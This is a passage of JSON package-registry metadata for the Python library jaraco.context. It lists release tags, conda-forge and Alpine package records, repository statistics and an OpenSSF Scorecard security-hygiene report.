","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.556Z","dependent_packages_count":1,"downloads":9335664,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":34.025455452957324,"dependent_packages_count":28.819565759920142,"stargazers_count":56.95033691040678,"forks_count":54.185175942101324,"average":43.49513351634639},"purl":"pkg:conda/jaraco.context?repository_url=https://conda-forge.org","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13549,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2348},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2026-08-23T05:06:09.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}},{"id":11765651,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_number":"6.0.1-r1","last_synced_at":"2026-07-24T20:02:45.079Z","created_at":"2025-06-07T18:25:39.405Z","updated_at":"2026-08-06T19:26:18.566Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.22/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hos